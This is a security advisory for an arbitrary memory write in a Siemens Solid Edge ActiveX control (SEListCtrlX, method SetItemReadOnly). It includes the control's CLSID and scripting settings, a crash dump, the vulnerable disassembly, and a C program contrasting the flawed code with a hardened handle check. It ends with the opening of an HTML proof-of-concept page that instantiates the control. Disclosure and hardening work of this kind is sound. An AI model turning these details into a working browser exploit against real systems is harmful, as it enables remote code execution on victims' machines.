
# Title : SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Rewrite RCE
# Published : 2013-05-26
# Author :

SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX Control SetItemReadOnly  
Arbitrary Memory Rewrite Remote Code Execution Vulnerability

tested against: Microsoft Windows Server 2003 r2 sp2
                Microsoft Windows XP sp3
                Microsoft Windows 7
                Internet Explorer 7/8

software description: http://en.wikipedia.org/wiki/Solid_Edge

vendor site: http://www.siemens.com/entry/cc/en/

download url: http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm

file tested: SolidEdgeV104ENGLISH_32Bit.exe


The software mentioned above installs an ActiveX control with
the following settings:

ActiveX settings:
CLSID: {5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D}
binary path: C:\Program Files\Solid Edge ST4\Program\SEListCtrlX.ocx
Safe For Scripting (Registry): True
Safe For Initialization (Registry): True

Because the control is registered as safe for scripting and safe for
initialization, Internet Explorer will instantiate it and call its methods
from any web page under the default Internet zone settings.


This control exposes the SetItemReadOnly() method, see typelib:

/* DISPID=14 */
	function SetItemReadOnly(
		/* VT_VARIANT [12]  */ $hItem,
		/* VT_BOOL [11]  */ $bReadOnly
	);

By passing a memory address as the first argument and 'false' as
the second, you can write a NULL byte into an arbitrary memory
location.

By passing a memory address as the first argument and 'true' as
the second, you can write a 0x08 byte into an arbitrary memory
location.

Example crash:

EAX 61616161
ECX 0417AB44
EDX 01B7F530
EBX 0000000C
ESP 01B7F548
EBP 01B7F548
ESI 0417A930
EDI 027D5DD0 SEListCt.027D5DD0
EIP 033FD158 control.033FD158
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFD9000(4000)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST1 empty 3.3760355862290856960e-4932
ST2 empty +UNORM 48F4 00000000 00000000
ST3 empty -2.4061003025887744000e+130
ST4 empty -UNORM C198 00000000 00000000
ST5 empty 0.0
ST6 empty 1633771873.0000000000
ST7 empty 1633771873.0000000000
               3 2 1 0      E S P U O Z D I
FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

Call stack of thread 000009B8
Address    Stack      Procedure / arguments                                                             Called from                   Frame
01B7F54C   027D5DF3   control.?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z                       SEListCt.027D5DED             01B7F548
01B7F560   787FF820   Includes SEListCt.027D5DF3                                                        mfc100u.787FF81E              01B7F55C
01B7F56C   78807BF5   mfc100u.787FF810                                                                  mfc100u.78807BF0              01B7F618
01B7F61C   78808312   ? mfc100u.78807A5B                                                                mfc100u.7880830D              01B7F618

vulnerable code, inside control.dll (labels placed from the jump targets;
the and instruction is 4 bytes, so L1011D158 + 4 = L1011D15C):

		Align	4
		push	ebp
		mov	ebp,esp
		mov	eax,[ebp+08h]
		test	eax,eax
		jz	L1011D15C
		cmp	dword ptr [ebp+0Ch],00000000h
		jz	L1011D158
		or	dword ptr [eax+2Ch],00000008h <-------------------- it crashes here
L1011D15C:
		pop	ebp
		retn	0008h

L1011D158:
		and	dword ptr [eax+2Ch],FFFFFFF7h <-------------------- or here
		pop	ebp
		retn	0008h
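The two paragraphs on the method's arguments and the disassembly above describe the same defect: the only validation of hItem is a NULL check, after which the dword at +0x2C is read, modified and written back through whatever pointer script supplied. The mangled name in the call stack, ?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z, decodes to void __thiscall SEListCtrl::SetItemReadOnly(SEListItem*, int), which matches the retn 0008h. The following C program is an added example, not Siemens' code: it models that body next to a hardened variant that treats the script-supplied value as an opaque handle and only dereferences it after matching it against the items the control itself owns. The SEListItem and SEListCtrl layouts, the item table and all names are assumptions; only the flags offset (0x2C), the 0x08 bit and the 0x61616161 value from the crash dump come from the advisory.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ITEM_READONLY 0x08u   /* the bit the OR/AND in the disassembly toggles */
#define MAX_ITEMS     4

/* Hypothetical item layout: only the position of `flags` (offset 0x2C, the
 * [eax+2Ch] operand in the disassembly) is taken from the advisory; the
 * padding stands in for whatever MFC/list fields precede it. */
typedef struct SEListItem {
    uint8_t  opaque[0x2C];
    uint32_t flags;
} SEListItem;

/* Hypothetical control: a table of the items it created. */
typedef struct SEListCtrl {
    SEListItem *items[MAX_ITEMS];
    size_t      count;
} SEListCtrl;

size_t flags_offset(void) { return offsetof(SEListItem, flags); }

/* Mirrors the disassembled body: NULL check, then a read-modify-write of the
 * dword at +0x2C through whatever pointer was handed in. */
static void apply_readonly_bit(SEListItem *item, bool readonly) {
    if (item == NULL) return;                     /* test eax,eax / jz */
    if (readonly) item->flags |=  ITEM_READONLY;  /* or  dword ptr [eax+2Ch],8 */
    else          item->flags &= ~ITEM_READONLY;  /* and dword ptr [eax+2Ch],FFFFFFF7h */
}

/* Vulnerable model: hItem arrives from script as a VARIANT and is used
 * directly as a pointer, so any integer the page supplies becomes the
 * address that is modified. */
void set_item_readonly_vulnerable(uintptr_t hItem, bool bReadOnly) {
    apply_readonly_bit((SEListItem *)hItem, bReadOnly);
}

/* Hardened model: the value from script is an opaque handle and is only
 * dereferenced once it matches an item this control owns.
 * Returns 0 on success, -1 if the handle is rejected. */
int set_item_readonly_hardened(SEListCtrl *ctrl, uintptr_t hItem, bool bReadOnly) {
    for (size_t i = 0; i < ctrl->count; i++) {
        if ((uintptr_t)ctrl->items[i] == hItem) {
            apply_readonly_bit(ctrl->items[i], bReadOnly);
            return 0;
        }
    }
    return -1;  /* unknown handle: nothing is touched */
}

/* Exercises both models with a constructed control holding one real item and
 * the bogus handle 0x61616161 seen in EAX in the crash dump. Returns a bitmask
 * of outcomes so the result can be checked without relying on printed output. */
unsigned run_demo(void) {
    SEListItem item;
    SEListCtrl ctrl;
    unsigned ok = 0;

    memset(&item, 0, sizeof item);
    ctrl.items[0] = &item;
    ctrl.count = 1;

    if (set_item_readonly_hardened(&ctrl, (uintptr_t)&item, true) == 0 &&
        item.flags == ITEM_READONLY)
        ok |= 1u;   /* legitimate handle: bit set */
    if (set_item_readonly_hardened(&ctrl, (uintptr_t)&item, false) == 0 &&
        item.flags == 0)
        ok |= 2u;   /* legitimate handle: bit cleared */
    if (set_item_readonly_hardened(&ctrl, (uintptr_t)0x61616161u, true) == -1)
        ok |= 4u;   /* script-chosen value: refused instead of dereferenced */

    /* The unchecked version behaves identically for a valid pointer; the two
     * only differ in what happens with a value the control never handed out. */
    set_item_readonly_vulnerable((uintptr_t)&item, true);
    if (item.flags == ITEM_READONLY)
        ok |= 8u;
    return ok;
}

int main(void) {
    printf("flags at offset 0x%zx, demo result 0x%x\n", flags_offset(), run_demo());
    return 0;
}
```

The design point is that a value which crosses the script boundary as a VT_VARIANT is untrusted data, not a pointer: the control has to resolve it against its own bookkeeping (a table, an index, a cookie map) before any memory is read or written through it, and refuse anything it does not recognise.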

Attached: code to reproduce the crash.

<!-- saved from url=(0014)about:internet -->
<object classid='clsid:5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D' id='obj' />
<script language='javascript'>